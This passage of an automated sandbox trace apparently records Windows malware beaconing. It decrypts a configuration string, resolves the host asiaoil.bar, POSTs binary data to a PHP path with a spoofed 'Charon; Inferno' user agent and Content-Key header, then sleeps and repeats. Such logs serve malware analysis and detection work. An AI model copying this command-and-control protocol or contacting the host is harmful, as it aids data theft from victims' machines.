returned 0x0 [0306.054] GetProcessHeap () returned 0x740000 [0306.054] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bfa8 [0306.054] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0306.055] GetProcessHeap () returned 0x740000 [0306.055] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bfa8 | out: hHeap=0x740000) returned 1 [0306.055] GetProcessHeap () returned 0x740000 [0306.056] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7669d8 | out: hHeap=0x740000) returned 1 [0306.056] GetProcessHeap () returned 0x740000 [0306.056] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763860 | out: hHeap=0x740000) returned 1 [0306.056] GetProcessHeap () returned 0x740000 [0306.056] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0306.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.057] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.069] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0306.075] GetProcessHeap () returned 0x740000 [0306.075] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0306.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.084] CryptImportKey (in: hProv=0x75cc38, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0306.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.085] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.086] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.086] GetProcessHeap () returned 0x740000 [0306.086] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0306.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.087] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0306.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.088] CryptDestroyKey (hKey=0x74d368) returned 1 [0306.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.089] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0306.089] GetProcessHeap () returned 0x740000 [0306.089] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0306.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.090] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0306.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.091] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0306.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.092] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0306.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.174] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0306.174] GetProcessHeap () returned 0x740000 [0306.174] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0306.174] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0306.175] GetProcessHeap () returned 0x740000 [0306.175] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b600 [0306.175] socket (af=2, type=1, protocol=6) returned 0x2c4 [0306.176] connect (s=0x2c4, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0306.197] FreeAddrInfoW (pAddrInfo=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0306.197] GetProcessHeap () returned 0x740000 [0306.197] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cf68 [0306.197] GetProcessHeap () returned 0x740000 [0306.197] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0306.198] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0306.198] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0306.198] GetProcessHeap () returned 0x740000 [0306.198] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0306.198] GetProcessHeap () returned 0x740000 [0306.199] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0306.199] GetProcessHeap () returned 0x740000 [0306.199] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x7639c8 [0306.199] GetProcessHeap () returned 0x740000 [0306.199] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0306.200] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0306.201] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0306.201] GetProcessHeap () returned 0x740000 [0306.201] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0306.201] GetProcessHeap () returned 0x740000 [0306.201] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0306.201] send (s=0x2c4, buf=0x747928*, len=243, flags=0) returned 243 [0306.202] send (s=0x2c4, buf=0x761fd0*, len=159, flags=0) returned 159 [0306.202] GetProcessHeap () returned 0x740000 [0306.202] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0306.202] recv (in: s=0x2c4, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 571 [0306.466] GetProcessHeap () returned 0x740000 [0306.466] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0306.467] GetProcessHeap () returned 0x740000 [0306.467] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7639c8 | out: hHeap=0x740000) returned 1 [0306.467] GetProcessHeap () returned 0x740000 [0306.468] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0306.468] GetProcessHeap () returned 0x740000 [0306.468] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cf68 | out: hHeap=0x740000) returned 1 [0306.468] closesocket (s=0x2c4) returned 0 [0306.469] GetProcessHeap () returned 0x740000 [0306.469] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b600 | out: hHeap=0x740000) returned 1 [0306.469] GetProcessHeap () returned 0x740000 [0306.469] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0306.469] GetProcessHeap () returned 0x740000 [0306.469] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0306.469] GetProcessHeap () returned 0x740000 [0306.470] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0306.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1074) returned 0x2c4 [0306.471] Sleep (dwMilliseconds=0xea60) [0306.473] GetProcessHeap () returned 0x740000 [0306.473] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7637d0 [0306.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.474] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.479] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0306.487] GetProcessHeap () returned 0x740000 [0306.487] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0306.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.488] CryptImportKey (in: hProv=0x75d980, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0306.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.489] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.561] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.562] GetProcessHeap () returned 0x740000 [0306.562] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0306.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.563] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7637d0, pdwDataLen=0x19fcfc | out: pbData=0x7637d0, pdwDataLen=0x19fcfc) returned 1 [0306.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.564] CryptDestroyKey (hKey=0x74d768) returned 1 [0306.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.565] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0306.565] GetProcessHeap () returned 0x740000 [0306.565] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0306.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.566] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.567] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.568] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.569] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0306.569] GetProcessHeap () returned 0x740000 [0306.569] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c098 [0306.569] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0306.569] GetProcessHeap () returned 0x740000 [0306.570] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c098 | out: hHeap=0x740000) returned 1 [0306.570] GetProcessHeap () returned 0x740000 [0306.570] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0306.570] GetProcessHeap () returned 0x740000 [0306.570] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7637d0 | out: hHeap=0x740000) returned 1 [0306.570] GetProcessHeap () returned 0x740000 [0306.570] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0306.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.573] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.580] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0306.586] GetProcessHeap () returned 0x740000 [0306.586] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0306.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.587] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0306.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.588] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.589] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.589] GetProcessHeap () returned 0x740000 [0306.590] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0306.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.633] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0306.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.634] CryptDestroyKey (hKey=0x74d768) returned 1 [0306.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.635] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0306.635] GetProcessHeap () returned 0x740000 [0306.635] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0306.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.636] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0306.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.637] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0306.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.638] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0306.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.639] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0306.639] GetProcessHeap () returned 0x740000 [0306.639] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0306.639] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0306.641] GetProcessHeap () returned 0x740000 [0306.641] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0306.641] socket (af=2, type=1, protocol=6) returned 0x2c8 [0306.641] connect (s=0x2c8, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0306.664] FreeAddrInfoW (pAddrInfo=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0306.664] GetProcessHeap () returned 0x740000 [0306.664] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d540 [0306.664] GetProcessHeap () returned 0x740000 [0306.664] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0306.665] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0306.666] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0306.666] GetProcessHeap () returned 0x740000 [0306.666] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0306.666] GetProcessHeap () returned 0x740000 [0306.666] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0306.666] GetProcessHeap () returned 0x740000 [0306.666] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0306.666] GetProcessHeap () returned 0x740000 [0306.666] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0306.667] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0306.668] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0306.668] GetProcessHeap () returned 0x740000 [0306.668] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0306.668] GetProcessHeap () returned 0x740000 [0306.668] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0306.668] send (s=0x2c8, buf=0x747928*, len=243, flags=0) returned 243 [0306.668] send (s=0x2c8, buf=0x761fd0*, len=159, flags=0) returned 159 [0306.668] GetProcessHeap () returned 0x740000 [0306.668] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0306.668] recv (in: s=0x2c8, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0306.900] GetProcessHeap () returned 0x740000 [0306.900] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0306.900] GetProcessHeap () returned 0x740000 [0306.901] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0306.901] GetProcessHeap () returned 0x740000 [0306.902] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0306.902] GetProcessHeap () returned 0x740000 [0306.903] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d540 | out: hHeap=0x740000) returned 1 [0306.903] closesocket (s=0x2c8) returned 0 [0306.904] GetProcessHeap () returned 0x740000 [0306.904] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0306.904] GetProcessHeap () returned 0x740000 [0306.905] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0306.905] GetProcessHeap () returned 0x740000 [0306.905] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0306.905] GetProcessHeap () returned 0x740000 [0306.905] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0306.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1078) returned 0x2c8 [0306.910] Sleep (dwMilliseconds=0xea60) [0306.912] GetProcessHeap () returned 0x740000 [0306.912] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763980 [0306.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.913] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.923] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0306.932] GetProcessHeap () returned 0x740000 [0306.932] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0306.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.933] CryptImportKey (in: hProv=0x75d980, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0306.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.934] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.935] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.935] GetProcessHeap () returned 0x740000 [0306.935] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0306.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.936] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763980, pdwDataLen=0x19fcfc | out: pbData=0x763980, pdwDataLen=0x19fcfc) returned 1 [0306.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.937] CryptDestroyKey (hKey=0x74d368) returned 1 [0306.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.938] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0306.938] GetProcessHeap () returned 0x740000 [0306.938] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0306.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.939] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.971] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.972] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.973] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0306.973] GetProcessHeap () returned 0x740000 [0306.973] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c070 [0306.973] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | 